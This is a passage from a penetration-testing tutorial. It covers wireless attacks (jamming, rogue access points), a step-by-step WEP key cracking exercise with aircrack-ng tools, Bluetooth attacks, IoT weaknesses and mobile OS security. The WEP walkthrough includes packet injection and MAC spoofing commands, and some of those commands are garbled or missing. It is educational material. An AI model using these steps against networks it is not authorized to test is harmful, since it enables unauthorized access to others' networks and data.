Note that jamming, while effective, is not something that should be carried out unless special permission is obtained. The reason for this situation is because blocking RF signals of any type is illegal and can result in substantial fines if you are caught.
Most, if not all, jammers are only available from overseas sources such as China. Seriously consider if trying this type of attack is something that needs to be done and, if so, how you will obtain permission from the applicable regulatory agencies.
A honeypot attack partly relies on social engineering and an understanding of how people use technology. Users can (and do) connect to any available wireless network they can find and may inadvertently attach to a network that is malicious.
In such a situation, an attacker can attract unknowing or unsuspecting users to attach to the access point that they themselves control.
To carry out this type of attack, a malicious party must set up a rogue access point (typically in the range of legitimate ones where possible). With the rogue access point generating a much stronger and clearer signal, it is possible to attract clients looking for an access point to attach to.
Once this has taken place, a malicious attacker can choose to view, modify, or block network traffic.
Choosing Tools to Attack Wireless
Several tools and mechanisms make locating a target network easy. Once you locate a wireless network, it is possible to strike it.
Picking a Utility
The following are methods that can complement wardriving or be used on their own:
OpenSignal This app can be used on the web at 3G and 4G LTE Cell Coverage Map or on a mobile device. You can use it to map out Wi-Fi networks and 3G/4G networks, as well as correlate this information with GPS data.
Kismet A Linux-based tool that is effective in locating wireless networks passively, meaning that the tool does not do much to reveal its presence to those who may be looking or listening.
InSSIDer This utility can be used to located wireless networks in an area and provide information on channels, frequency, and power.
Network Signal Info This application is available for the Android operating system and can be used to both analyze and locate wireless networks.
Wireshark is a sniffing utility but can also be used to intercept traffic from wireless networks. However, to fully analyze wireless network traffic with Wireshark, the AirPcap USB dongle is required. With AirPcap it is possible to analyze wireless traffic all the way down to the hardware layer.
Under ideal conditions, these tools can help locate any of the following information about a wireless network:
Presence of multiple access points Possibility of recovering SSIDs Authentication method used
Choosing the Right Wireless Card
If you are going to analyze and interact with wireless networks as a pentester, you need to consider the wireless card or adapter that you will be using. In the majority of wireless cards you will not have to consider all that much about the make, model, and manufacturer of a card most are compatible with the tools and techniques you will use.
However, in the case of mobile devices such as tablets and cell phones, which may use Wi-Fi, the internal adapters typically do not support the advanced features you need. This situation necessitates the use of external adapters.
When purchasing a wireless adapter, consider the following:
The operating system in use Application in use Whether packet injection is required (Windows systems cannot perform packet injection; if this is required, then Linux must be used)
Manufacturer of wireless card and chipset (you must know both since the two can be made by two different manufacturers)
Whether the adapter supports both monitor and promiscuous modes. If you are using virtualization, you may also need to check whether your card will work with this environment.
Let’s put this all together and try breaking WEP using Linux.
In this exercise, you will use Linux with a few tools to crack and retrieve a WEP key. The version of Linux you will use for this exercise is Kali 2.0 and you won’t use virtualization.
(If you choose to use virtualization, you will need to obtain a USB wireless adapter and consult your virtualization software to configure the adapter to be recognized as a wireless card.)
1. Obtain information about your wireless card by running the command iwconfig from the Terminal window.
If your wireless card is detected by your operating system, it will start with the prefix “wlan,” followed by a number.
In most cases, the numbering will start with zero (i.e., wlan0) and will count up from there.
2. Put the wireless adapter into monitor mode in order to pick up wireless traffic. This can be done by executing the command
Airmon-ng start wlan0
where wlan0 is the name your adapter was given.
3. Capture traffic using the command
Airodump-ng start mon0
where mon0 is the monitoring interface.
4. List the wireless networks in the area:
5. In the list of networks, locate your target network and note the BSSID and channel.
6. Using the airodump-ng software, start capturing packets from the target network:
airodump-ng -c [channel] --bssid [bssid] [monitor interface]
airodump-ng –c 11 –bssid 00:09:5B:6F:64:1E mon0
7. Inject packets into the network by waiting for someone to connect so you can obtain their MAC address.
8. Once you have captured the MAC address and have extracted it from the airodump file, you can replay the MAC as part of an ARP request using airplay-ng. You will be capturing an ARP packet and then replaying that ARP thousands of times in order to generate the IVs that you need to crack
WEP. To do this, you will need to spoof the target’s MAC address.
You can use aireplay-ng to do this.
Aireplay-ng -11 –b 00:09:58:6F:64:1F
–h 44:60:57:C8:58:A0 mon0
Aireplay-ng –[c] –b [bssid of AP]
–h [MAC of target] [interface]
where c is the channel you want to observe.
Airodump will capture the traffic generated into a file in the current folder on the local system.
9. Once you have enough traffic (usually around 100,000+ packets in many cases), stop the capture by pressing Ctrl+C.
10. To recover the password or key, use aircrack-ng: Aircrack-ng [filename.cap] where filename.cap is the name of the capture file.
If you have captured enough traffic, aircrack-ng will display the key on your screen, usually in hexadecimal format.
Simply take that hex key and apply it when logging into the remote AP and you should connect to the network.
Knocking Out Bluetooth
Wi-Fi isn’t the only wireless technology on the block—we can’t leave out Bluetooth. Bluetooth is a series of specifications that refer to a short-range technology that is used to create personal area networks (PANs). This technology is extremely common nowadays and appears in everything from mobile phones to cars and game controllers.
Bluetooth is designed to be a universal standard for communications for devices of all types. The communication protocol operates in the 2.4 to 2.485 GHz band and was developed in 1994 by Ericsson Corp.
Under normal conditions, Bluetooth has a distance of about 30 feet or 10 meters. However, manufacturers can choose to implement measures or features in their products to increase the range of their products substantially. With special antennas, you can extend the range even further.
The process through which two Bluetooth-capable devices connect to each other is known as pairing. Any two Bluetooth-capable devices are able to connect to each other.
To do this, a device will typically need to be discoverable so it can transmit its name, class, offered services, and other details. When devices pair, they will exchange a pre-shared secret or link key. They store this link key to identify each other for future pairings.
Much like networking technologies, every device has its own unique 48-bit identifier and generally an assigned name.
Once paired, Bluetooth devices create a piconet (or very small net). In a piconet, there is one master and up to seven active slaves at any one time. Because of the way Bluetooth devices work, the chances of any two devices sharing the same channel or frequency is very low and therefore conflicts are kept to a minimum.
One of the problems with Bluetooth is that it generally is a very short-range technology; however, the problem is a perception on the part of the users of this technology.
Many users of Bluetooth-enabled devices believe that, because the technology is so short range, it is impervious to attack since attackers would need to be within visual range.
However, this is not true. The hacking process is easy for an attacker because all they need is the software, a suitable device, and some basic knowledge.
So, how good is Bluetooth security? Well, that’s a question still open to debate, but in general, security is limited to a few techniques. First, frequency hopping— a process in which the frequency is changed at regular intervals during communication—is used to prevent conflicts or other issues.
Both the master and slave know the frequency hopping algorithm, but the outsider does not and therefore should not be able to get the correct frequency easily. Second, a preshared key is exchanged at a pairing that is used for authentication and encryption (128-bit).
The three security modes for Bluetooth are
Security Mode 1 No active security.
Security Mode 2 Service-level security. A centralized security manager handles authentication, configuration, and authorization. This mode may not be activated by the user, and there is no device-level security.
Security Mode 3 Device-level security that is always on. Authentication and encryption are based on a secret key. This mode enforces security for low-level connections.
Much like with wardriving, an attacker who has the software installed on their mobile phone, laptop, or netbook will know which ones to target.
All the hacker has to do is to walk around in public places and let their software do all the work, or they can sit down in a hotel reception or restaurant pretending that they are working.
The whole process is automatic for the hacker because the software in use will scan nearby surroundings for Bluetooth devices.
When the hacker’s software finds and connects to a Bluetooth-enabled cell phone, it can download contact information, phone numbers, calendars, photos, and SIM-card details; make free long-distance phone calls; bug phone calls; and much more.
Types of Bluetooth Attacks
Let’s take a look at some of the attacks you can perform using Bluetooth:
Bluesnarfing The process of gaining unauthorized access to access and download all information from a targeted device. In an extreme case, bluesnarfing even opens the door for a hacker to send instructions to completely corrupt and destroy.
Bluebugging An attack in which an attacker plants software on a device that allows it to become a bugging device on demand. Once your device is bluebugged, the hacker can listen in on anything you and anyone around you are saying.
Bluejacking The process of sending unsolicited messages to a Bluetooth-enabled device; akin to spamming.
Bluesniffing The attacker is capable of viewing information as it flows to and from a Bluetooth-enabled device.
Many of these attacks can be carried out with specialized software and the right hardware. In the case of Bluetooth, you must have an adapter that injects packets into the network and also has sufficient range, allowing it to be out of sight of the victim. Currently, a number of Bluetooth adapters are available that can extend the range of transmissions to over 1000 feet with an external antenna.
Things to Remember About Bluetooth
When working with Bluetooth devices, you should keep some specifics in mind about the devices and how they operate. First, the device can operate in one of the following modes:
Discoverable This allows the device to be scanned and located by other Bluetooth-enabled devices.
Limited Discoverable In this mode, the device will be discoverable by other Bluetooth devices for a short period of time before going back to being nondiscoverable.
nondiscoverable As the name suggests, devices in this mode cannot be located by other devices. However, if another device has previously found the system, it will still be able to do so.
In addition to the device being able to be located, it can be paired with other devices to allow communication to occur. A device can be in pairing or nonpairing mode. In pairing mode, it can link with another device.
Hacking the Internet of Things (IoT)
We can’t finish up this blog without discussing something that you need to check for as a pentester: the Internet of Things (IoT). The IoT is a buzzword used to refer to the increasing numbers of objects that can connect to the Internet that don’t fit nicely into the category of computers or other devices.
For example, objects such as appliances, sensors, home automation systems, vehicle media systems, wearable computing devices, and more all come in variations that connect to the Internet for data exchange purposes.
Such systems typically have an embedded OS and a wireless or wired card that can be configured to attach to a home or business network.
The problem with these devices from a security standpoint is simply the fact that most of them don’t have any security. Many of these devices were designed to offer specific functions to the consumer or business, and typically this means that little or no attention was given to security.
Poor or missing security measures can be the bane of network admins—and a potential entry point for you as a penetration tester.
From a pentest standpoint, you may want to use your tools to scan for wireless-enabled devices to see if you can identify an IoT device. Once you find such a device, you can attempt banner grabs or port scans to see if you can identify the device.
If you can identify it, do your research to see if you can find potential entry points or vulnerabilities you can exploit. If done right, you can use a compromised device as a pivot point, or a launching point, for deeper strikes into a target network.
From a defensive perspective, these devices should not only be evaluated for security issues, but also placed on their own special network segment. To improve security, any object that needs to be directly accessible over the Internet should be segmented into its own network and have its network access restricted.
The network segment should then be monitored to identify potential anomalous traffic, and action should be taken if there is a problem.
Dealing with Mobile Device Security
In today’s connected world, the average person possesses at least four mobile devices. In fact, some individuals use their smartphone to replace traditional platforms. This is possible because mobile devices in the past few years have increased in power, capability, and flexibility.
There is an increasingly diverse range of devices deserving of the “mobile” moniker besides smartphones, though. They include fitness trackers, smart watches, and even virtual-reality devices.
People rely on these devices to give them information about the world around them, and the devices allow for the recording and tracking of vast sums of data that were just not possible to gather and record in the past.
Because this data is being collected for mobile devices, stored on mobile devices, and even being uploaded to a cloud system, attackers have increasingly turned their attention to mobile devices and their information.
As a pentester, you need to know how mobile devices function and the issues they introduce to the workplace or any other environment they exist within. The reality is that mobile devices will continue to appear in ever-increasing numbers and will need to be considered by any competent pentester.
In this blog, you’ll learn to:
Recognize what constitutes a mobile device
Understand the features to expect from a mobile device
Recognize the security issues specific to the mobile platforms
Recognizing Current-Generation Mobile Devices
Mobile devices have evolved dramatically over the past decade. Gone are the days of bulky and underpowered as well as underdelivering devices. The forerunner of the current mobile device, the T-Mobile Sidekick, debuted in 2002 in the United States.
This device, while underpowered and with limited features compared to today’s smartphones, represented the beginning of the contemporary style of mobile devices that have had such a huge impact on the world today.
The mobile devices that appeared over the next several years up to the current day started with the introduction of smartphones from manufacturers such as Samsung, Nokia, and Ericsson as well as many others.
Though the available devices increased in power and capability over the years, it took Apple in 2007 to debut its popular iPhone to bring the mobile market to the masses.
It also accelerated the development of more advanced smartphones in different forms from the many vendors that exist today. From 2007 through 2016, Apple has sold millions of iPhones worldwide to an eager public looking to adopt the latest technology.
Since then, many other vendors have released their own spin on the smartphone paradigm, which has resulted in not only different types of hardware but different operating systems in the form of Android, BlackBerry, and even Windows Mobile.
In addition to smartphones, a popular tablet market exists. Before 2000 tablets were bulky and underpowered compared to what we would consider a useful tablet today. It wasn’t until the year 2010 with the introduction of the iPad from Apple that the public started to embrace the technology as a whole.
The iPad showed that a tablet could be very small and lightweight, have a decent battery life, and have a broad range of features that didn’t exist in previous models and forms.
As smartphones and tablets evolved, so did the operating systems that powered and ran these devices along the way. In particular, Google’s Android operating system has evolved dramatically and continues to do so.
The open source nature of the Android operating system allows developers to fine-tune and tweak as well as enhance the operating system to run on other devices, including wearable devices, heads-up displays, and even cable boxes, just to name a few.
Mobile OS Versions and Models
One of the biggest issues that have arisen with the adoption of mobile devices has been the security of data, especially when used in the workplace. The vendors that manufacture the devices, as well as their operating systems, have found many ways to deal with security issues while still retaining usable and functional devices.
The ability to use techniques like encryption, permissions and different forms of authentication have all been integrated and adopted by device manufacturers, with differing degrees of success along the way.
Vendors have had to sort out is what is the proper balance between security and the usability of a device. An environment can be made more secure, but that security tends to result in a device that is a little less easy to use.
On the flipside, a device that is easier to use tends to do so by sacrificing some level of security along the way.
For example, a device that wishes to use encryption to protect its data will typically require the user to implement passwords and other features on the device that will require users to enter a set of credentials before they can use the device.
Since most users find this to be an annoyance, they may choose to forgo passwords as well as encryption in order to be able to pick up their device and use it immediately. Of course, choosing this option will result in the device being less secure than it would be otherwise.
Making the situation more complex is the race between vendors to add more features and more capabilities to give themselves an edge over their competitors. As a list of features has grown over the years in these mobile devices, the tendency to add more convenience features over security or at least make security an emphasis has appeared.
In the current mobile device market, four mobile operating systems are available for the consumer to choose from when selecting a device. These four major operating systems are Google’s Android, Apple’s iOS, BlackBerry, and Windows Mobile for Microsoft.
Of these four operating systems, the two that are the most widely used and encountered are Google’s Android and Apple’s iOS. Apple’s iOS is found on Apple devices exclusively and is thus customized and tweaked for that manufacturer’s own environment.
In the case of Android, we have a system that is ready to customize and tweak to essentially any type of environment given the knowledge and time to do so. Of these two, Google’s Android is the leading mobile OS in the marketplace.
Threats to Mobile Devices
When looking at these two mobile operating systems, you will notice some similarities between the two, at least in concept if not implementation and the types of threats that a mobile device will encounter are going to be the same even if the device that encounters them is different.
With this in mind, it’s important to take a look at some of these issues so that you can understand the goals the developers had in mind when doing their job.
Some of the most basic security concerns on mobile devices involve the following:
Malware This is an area that is not unknown to anyone who uses a computing device nowadays because it is so common to encounter malware and its mischief. Malware is known to cause monetary damages in the form of lost
BlackBerry and Windows Mobile will not be discussed in this blog because they are less popular. The likelihood of encountering these devices is quite low given the overall number of devices in the marketplace.
productivity, stolen information, and other cybercrimes of varying forms along the way. Borrowing from the lessons that have been learned from the traditional desktop market, developers of mobile systems sought to secure their systems and harden them against the threat of malware.
Resource and Service Availability Abuse The intentional use or misuse of resources on any given device or environment has been a long-standing issue in the traditional technology market and is one that has continued on to the mobile device market as well.
A misbehaving application or poorly designed piece of software can easily render the hardware or software ineffective or unstable and thus not desirable to the consumer.
In addition, using the misbehaving software on a mobile device can mean what few resources are available can be quickly exhausted, which in some cases means that battery power itself could be consumed rapidly and thus render the whole device an expensive paperweight until the battery can be recharged.
Malicious and Unintentional Data Loss If there’s anything that malware has taught us, it’s that malicious data loss is definitely a problem in the form of identity theft or other appropriation of information.
Additionally, the loss of information via carelessness or misuse of a device by the consumer is a very real issue and thus developers took steps to ensure that data was safeguarded against both malicious and accidental loss.
Of course, there are many more types of threats and issues that a mobile device can and will encounter, but to keep things simple we will focus on these key areas.
However, it is safe to say that many of the issues that you may have encountered in your own experience, or even the ones encountered and discussed in this blog, are ones that can easily be moved over to a mobile environment and cause problems for the consumer of these devices.
Goals of Mobile Security
When vendors design a device, they have many goals in mind in terms of features and capabilities as well as other areas. All these goals are taken into account in order to make their device better as well as differentiate it from those of their competitors.
While we won’t worry too much about usability features, we will focus on the security features and what may motivate developers to include such security features on their devices where applicable.
Keep in mind at the highest level of this discussion that the overall goal is to protect the security of a consumer’s data and minimize the risk of threats and vulnerabilities on any given device. The vendors’ approaches to this have varied dramatically in many cases, but the overall goals have remained the same.
So, what are the security goals of most mobile device vendors? There are five areas where effective security measures need to be developed for any given mobile device. Not all mobile devices address all five of these concerns, but the more of these points that are addressed, the more secure the device.
Let’s dive right in and talk about these five points a little bit and then apply them later when we review the different system architectures in both Android and iOS.
The first area that a device manufacturer will attempt to address in order to make a more secure mobile device is that of access control.
Access control on a mobile device in concept is similar to the way it would be on a regular operating system or a server operating system, meaning that access is granted or denied based on a series of permissions and rules that describe what level of access is in place for any specific group or individual.
When properly implemented, access control can strictly regulate interaction that could be had with any system resource, application, an item of data, hardware, and other components of a system.
In practice, access control should strive to be in a default state where no individual or group can perform any action unless they are explicitly or implicitly granted the ability to do so, resulting in a stronger system overall.
The next area that vendors try to address, and have been addressing over the past 15 years in various operating systems in many different forms, is that of digital signing. Digital signing is a process where an item such as software can be validated as having come from a certain source and therefore is authentic.
This is an absolutely invaluable feature to have on modern operating systems and platforms because it can ensure that software or other items that come from a third party are indeed authentic and have not been altered, hopefully meaning that the chance of compromising the security or stability the system is minimized.
In practice, digital signing has done precisely this for software; many applications are signed by the developer of the application, which provides a means of asserting the origin and authenticity of software.
It is also used to sign device drivers in modern operating systems to ensure that a device driver comes from a valid source and is not something a third party may have created and is trying to get installed on your system so they can potentially cause harm.
A critical component of mobile devices has been that of device encryption. Encryption is a mechanism that you can use to protect data from being disclosed to those who do not have the authorization to view it. Encryption also ensures that data has not been altered by a party not authorized to do so.
While encryption is not designed to prevent a device from getting stolen or being searched by a third party, it provides a safeguard against anyone who is not the owner of the device from viewing data and potentially getting access to secrets that they shouldn’t have access to in the first place.
It’s also worth mentioning that encryption in mobile devices can be a legal issue; some industries have legal regulations placed upon them, and the same regulations could require certain types and levels of encryption are put in place as part of normal security measures.
Isolation has also proven to be an important and significant part of device security over the last handful of years because it can dramatically improve the stability of a device and the security of various processes on a system.
Isolation works by limiting access to any one application or process to any other application or resource to preserve the stability and other elements on a system. In some ways, isolation is a form of access control, but this type of access control doesn’t apply to human beings as much as it applies to applications that are running on any given system.
Finally, one really important area of device security is the use of permissions to provide granular access to system resources. By using a permission-based model, you can implement a system where only the actions needed by a user to perform a specific task are granted.
Nothing else is granted to avoid providing too much access to users and potentially risking the stability and security of the device itself.
Again, why these may not be all the areas that device manufacturers might strive to protect when developing their device and their operating system model, they do represent some of the key areas that almost all vendors have to take into consideration.
Working with Android OS
The first mobile OS we will address is Google’s Android operating system. This operating system is coming up on its 15th birthday in 2018; it was originally developed and released in 2003 by a company called Android Inc.
Android Inc. didn’t stay independent for too long, and it was later purchased by Google with the idea that the brainpower that developed Android come to work for Google and help improve the OS for the new range of Nexus and Android-powered devices that Google was endorsing and supporting to be released on the market.
When the operating system was first envisioned, the idea was to have an operating system that was open source, secure, stable, flexible, and easy for third parties to develop applications for.
When first released all the way up to the current day, the Android OS has met these goals to varying degrees and has become the leading OS on mobile devices of all types.
Consumers flock to the Android OS because it is feature-rich, powerful, and free.
Another attractive feature of this OS is that it is based quite heavily on the Linux operating system (with Security-Enhanced Linux Kernel [SELinux]), so for those who are familiar with Linux on other platforms, these skills and knowledge can be moved quite easily over to this new mobile environment.
Over the last decade, Android has evolved substantially to include support for an even greater number of devices and just about every major service of any consequence online, such as file sharing services, cloud services, social networking, and even third-party authentication services. Android 7 is scheduled to be released in 2017.
So, how does Android deal with the five essential points that a secure mobile operating system should be able to deliver? Android scores quite high compared to iOS; it is able to offer support in the form of numerous features for all five of the key areas whereas the iOS systems do not.
Now does this really mean the Android system is more secure than iOS? All it means is that Android OS does support the five areas discussed here in this blog, and thus in this context, this means we have a potentially more secure operating system over its competitor.
Boosting the security of the Android OS just a little bit further is the fact that developers and consumers both have their own ways of interacting with the system, with one being more secure than the other. Android was developed with the consumer market in mind, and thus the interface presented is simple for a first-time user.
However, developers can enable special modes on the system and secret menus on the system that will allow them to perform actions that the regular users of the system will not see. Because the developer tools are hidden from a regular user, users avoid causing harm to the system itself.
Rooting on Android
What about when a regular user decides that they want to do more with the system than the restrictions in place on the device will allow? Well, this involves a process known as rooting, which is designed to increase the level of access to any user to an extreme degree.
After rooting is completed, the user of a system has nearly unlimited access to anything in the system they want to interact with, with essentially no restrictions.
Why this may sound like a good idea, it is definitely not a good idea for most because the average user can very quickly get themselves in trouble by attempting something on a system that would normally trigger an alert or just block their actions.
When rooting is in place, the user will no longer get the volume of warnings or blockages that they did before. They could harm the system itself without any warning.
What exactly is rooting in the context of an Android device? Well, the simplest explanation is that rooting involves running a processor script on an Android device, and if the execution of this application works as planned, the device should be unlocked and rooted, meaning that the user or whoever has the device is able to do whatever they want whenever they want.
It is because of the power unleashed by rooting a device that the process should only be undertaken by those who are experienced and knowledgeable enough to avoid negatively impacting the security of a device.
Fortunately, the process of rooting is not the easiest process to undertake. It requires some research and some effort to perform in the first place. The amount of effort and knowledge required to root the device will vary depending on the device in question, however.
It is also important to note that improperly or incorrectly rooting a device can not only have a negative impact on security but also result in a device that is completely inoperable or “bricked” in some cases.
Playing in a Sandbox
The design of Android is not that much different from that of other operating systems. While it is true that Android is made up of a collection of processes and components just like other operating systems, there are differences in how they are implemented within the device and the operating system itself.
Android uses a design called a sandbox that emphasizes the isolation of components and processes. Each component that runs within the Android environment is designed to be as self-contained as possible and only communicate with each other in very specific means using specific processes to control and limit how the interactions can occur.
The result of this design is that processes and components are strictly controlled and isolated except in cases where they specifically have a reason to communicate; even then the communication is controlled in order to prevent potential security and stability issues.
While we won’t get into the hard-core technical details of how this is done—that is something for the developer to research—it is worthwhile to mention that isolation and to a certain degree, access control is built right in this system at the process level.
In terms of access control and limiting access to not just data but components on the system itself, let’s take a moment to discuss the kernel of the Android operating system.
The kernel of an operating system represents the “heart” of the whole system and is responsible for scheduling resources, controlling input-output, as well as controlling other essential components and resources on the system. In the case of Android, this is no different.
In an Android system the kernel, for all intents and purposes, is the only piece of the system that gets root access and is, therefore, able to perform any operation or function that it needs to.
The result of this design means that a kernel is able to do what it needs to in order to keep the system running and functioning properly, which is exactly what you would want to have the kernel be able to do in order to function properly, as limited access to such an essential part of the system would not work properly.
Of course, anything that is not specifically the kernel will run with some lesser degree of access depending on a specific function and role within the framework of the system.
Let’s talk about some other components of the Android operating system just briefly:
Application Runtime (ART) One of the components of the Android operating system that was introduced in version 5 (and has since been part of all later additions) is the Android application runtime (ART). This component was implemented to replace the older Dalvik runtime present in previous versions of the operating system.
Essentially what this component does is allow applications to run in a virtual machine environment within Android. This is not an unusual situation for those who are familiar with the Java environment, which uses a similar strategy for running applications within its system.
As a matter of fact, most Android applications are written in the Java language, which many people are familiar with from using applications on the web or other situations.
Google Play A major benefit of the Android operating system is that whatever isn’t present in the operating system as it ships from the manufacturer can be added later on.
The default, and preferred, way to add applications within the Android operating system is to use the popular Google Play service, which is a store where users can download applications for free or for a minor fee and install them into the operating system.
The user no longer has to keep backup copies of media or store the apps on a USB device; they can simply use a Google account, associate the applications with that account, and then download them as needed—for example, if they move to a new device or reset their current device and have to reset it.
Over-the-Air (OTA) Update Another huge benefit of the Android operating system is the ability to provide updates. Updates are an essential part of any operating environment;
it is how deficiencies in security issues and other problems are addressed. Android updates can be anything from a minor download all the way up to an update for the whole operating system.
Android updates are delivered using what is known as over-the-air (OTA) strategy or over the Web using wireless capability such as Wi-Fi.
Because updates by default are delivered automatically (or the user is prompted to download and install them), it tends to be much more likely that a device will be kept up-to-date than in previous operating systems.
During its lifetime Android has proven to be a flexible, powerful, and highly customizable operating system that operates effectively cross-platform.
Building a Custom Droid
The Android operating system that is provided by default from Google has proven to be adept at providing a good experience for the user. However, Android is not going to address the needs of most pentesters because it does not have enough of the system accessible or available to allow for effective testing.
So, as a pentester, you will typically have to do a few more things to make the system usable for your particular needs. To do this, there are some options available to you for customizing the system.
The first option is to take the stock operating system that ships with the device and then root it. Since this process opens up the system and allows anything to be done with the device, it means that you will be able to perform more actions and even install apps on the system that wouldn’t run without root access.
This is a fairly straightforward option to employ; however, it still means that you must seek out your own tools to perform the pentesting process, which is going to be a challenge in most cases because there are so many.
Second, you could resort to an off-the-shelf option in the form of a preconfigured operating system such as Kali Linux NetHunter. This operating system is the cousin of the well-known Kali operating system, which is also used for pentesting, but on non-mobile environments.
To install this operating system, all a potential user has to do is go to Penetration Testing and Ethical Hacking Linux Distribution and download the installation utility.
On Windows, this is a wizard that users click through to answer some questions; then with the device plugged into the desktop or laptop via USB, they only need to hit Finish and let the wizard install and configure the device with their new operating system.
Additionally, a huge benefit with this option is that over 1,000 tools ship with the OS by default, meaning that a proven portfolio of tools is available and ready to use without having to invest large amounts of time searching for useful or functional tools.
Of course, there are other operating systems that can also be used for pentesting and that are security minded, but they are too numerous to list within this blog.
However, if you are curious about different options as far as Android-based pentesting distributions, a Google search can yield lots of results so that you can do your homework and see which is suitable for your use.
Working with Apple iOS
The second most popular mobile operating system available today is Apple’s iOS system.
iOS has proven to be popular because it is easy to use, learn, and navigate by anyone who wishes to pick up a device and start using it. iOS, much like Android, is able to be run on both tablets in the form of Apple’s own iPad as well as the iPhone.
But no other devices outside of the Apple environment will run this operating system (which is not like Android, even though it shares similar heritage through its basis on Unix).
Unlike Android, which is able to address all of the five points that were mentioned earlier, Apple’s iOS is only able to cover four of the core points for a secure mobile operating system as defined previously.
Apple’s iOS is able to provide some form of protection and control in the areas of Access control, such as passwords and account lockout and even permissions
Digital signing of applications, which means that applications installed through sources such as Apple’s own store have been verified and vetted to ensure that they are quality and come from an authentic source Application of encryption.
Which means that applications can communicate using encrypted traffic and that data stored on the device can be encrypted as well as Isolation, which is a core element of iOS just as it is with Android;
processes and applications are restricted as to how they can communicate with one another, thus reducing the chances of stability and security problems in general
Something that is worthwhile to point out is that, unlike Android, Apple’s iOS is set up and designed to only allow applications that originate from Apple’s own store to be installed on a device.
As for security and quality goes, this ensures that only safe and stable applications make their way onto a device, and anything that doesn’t meet the standards or hasn’t been vetted through Apple’s own process of validation will not get installed.
But you’ve probably run into someone at some point who’s had applications running on their own device that don’t originate from Apple’s own store. So where do these applications originate from, and how do they get installed on a device that should not allow them to be installed by design? This is known as jailbreaking.
Jailbreaking Apple’s iOS
In a nutshell, jailbreaking is the process of rooting, except that it is used on an Apple iOS-based device.
When a device undergoes the jailbreaking process, it allows that specific device to lift the limitations on running non-Apple-approved applications and other types of software, thereby allowing the device owner to install whatever they want from wherever they got it.
In practice, this is an attractive option for many device owners because it eliminates these barriers and allows them to take full control of their device.
Of course, much like on Android, this does present a problem because it becomes entirely possible for applications that don’t come from Apple’s own store to be installed, and therefore security or stability can be compromised.
Thus, jailbreaking should be attempted only by those who
Understand the risks of jailbreaking a device
Know how to keep themselves out of trouble when they install unvalidated software
Are aware of the implications of performing certain actions
And, as a footnote to the story, jailbreaking, much like rooting, is the quickest way to avoid a warranty, so this is another point to keep in mind when undertaking either of these operations.
Finding Security Holes in Mobile Devices
Mobile devices are convenient, but they also introduce their own set of security holes that can also be exploited by a pentester. Like many security problems, many can be avoided with a good dose of common sense and due care.
Risks incurred by installing software from unknown or unverified sources can be limited by doing research about what is being installed.
Also, installing software such as antimalware is helpful because it can blunt the risks associated with getting malware such as viruses, worms, spyware, and other nastiness on a system.
So what are some other problems that present themselves as risks to the mobile platform that can be exploited as well as mitigated, depending on whether you are a pentester or a device owner? Let’s look at a few that present themselves as obvious issues.
Cracking Mobile Passwords
The protection offered by passwords is something that is well documented and well understood in the computing and technology industry. However, there are still many cases where passwords are created improperly, meaning that they are too short, don’t use the full range of characters, or violate other complexity requirements.
In the mobile environment, another problem presents itself: more often than not, there is an utter lack of a password on a device. Many users of mobile devices are still in the habit of not setting up a password; they see it as an unnecessary obstacle to being able to pick up their device and simply swipe their finger or tap a button and be able to start using it.
The perception is that the convenience of being able to use the device right away versus having to take a moment or two to tap in a password is a good trade-off. Amplifying the danger of a lack of password is the fact that a lost device can be accessed without any challenge whatsoever.
Considering that a mobile device is very easy to lose, this is a huge risk.
Finding Unprotected Networks
One of the problems with mobile devices is the tendency for users to connect to unprotected or unknown wireless networks. There are many reasons why a mobile user might choose to connect to a network that they don’t know or don’t control.
For instance, one of them a smartphone user might think that, rather than use the precious bits of data that all but those on unlimited data plans have to worry about, why not use an unlimited Wi-Fi connection instead?
Although the motivation makes sense, the danger of connecting to an unknown wireless network is huge. It is entirely possible that connecting to an unknown wireless network can lead to identity theft, privacy loss, or the loss of data and other forms.
Thus users of mobile devices should avoid attaching to unknown or uncontrolled wireless access points if at all possible. However, if there is no other option, then it’s a good idea for users to make use of any one of a number of VPN services on the Internet to encrypt and protect their information.
Encountering Bring Your Own Device (BYOD)
BYOD has been a trend that has seen an upswing in the amount of support by both companies and their employees over the past half-dozen years or so, so you need to be aware of how this system works and how it may impact your testing.
The simple concept behind this practice is that the employees of a company will supply their own computers and equipment when they are hired by a company.
The company itself will own and maintain a network, as well as all the backend equipment required to support that network, such as servers, email, and other common infrastructure items. But employees will plug their equipment into this company-supplied and -maintained network.
The current corporate environment that employs the system of operation for its employees and their own technology typically leads to a situation where individuals bring in their devices in the form of notebooks and tablets or even desktops in some cases.
Once these devices are brought on premises, the employee will plug them into the company’s own network, and provided everything checks out in the form of having the latest protection and patches and other items in place, they will be allowed to access the network fully as required to do their particular job.
As good as this practice seems, there are still some flaws that can emerge with the system, and these are the flaws that you should be aware of as a pentester. They can represent points of opportunity for you to be successful in gaining access to the network itself.
Leading the charge on security, or weakening security, in this case, is the fact that maintaining a secure environment with all these devices brought in by employees is tough considering the potential for a diverse client environment.
Equipment that is not owned by a company can be difficult to manage and monitor as well as applying patches and support to so many diverse platforms.
A company may choose to place some limits on the type of equipment that employees can purchase or use in their environment, and will typically make policies clear as to what steps should be taken (such as implementing antimalware and other security measures).
Even with such policies and practices in place, IT departments by necessity will have to be extra vigilant about the security issues that can appear in such environments.
Choosing Tools to Test Mobile Devices
Pentesting mobile devices share a lot of commonalities with pentesting using traditional devices. The techniques are very similar if not exactly the same, the concepts are the same in just about every case, and many of the same tools that are present in non-mobile environments are present in the mobile environment as well.
When looking at the pentesting process with a mobile device, the process itself is identical so you won’t have to adapt to a brand-new process. The phases of reconnaissance all the way through the post-exploitation phase will look the same. The main differences are the platform being used (in this case, a mobile device) and perhaps some of the tools that you use.
Initially, when mobile devices were introduced, the number of tools that could be used for pentesting was quite limited. Many of the tools were designed to do network troubleshooting and perhaps look for wireless networks, but not much more beyond that.
However, as time has moved forward more tools have become available and have created the potential for pentesters to build a highly customized set of tools that are tailored to their own liking.
If you are using NetHunter to serve as your pentest environment, you can avoid the issues involved with hunting down and verifying your own tools. It is also possible that you may choose to employ a preconfigured pentest environment such as NetHunter and also install your own choice of tools on top of this platform.
In any case, the potential to highly customize the mobile environment to your own needs is advantageous to you as a pentester.
The following list of tools illustrates some of the items that are available to you as a pentester to use within the mobile environment, but it’s not an exhaustive list by any means. It is only meant to introduce you to some of the possibilities for tools that exist for performing pentesting.
IPTools by NetworkByte is a collection of tools used to provide information about different properties of the network, such as routing information, DNS settings, IP configuration, and more.
Mobile Nmap, by Gao Feng, is just like the name implies: a mobile version of the powerful nmap port and network scanner.
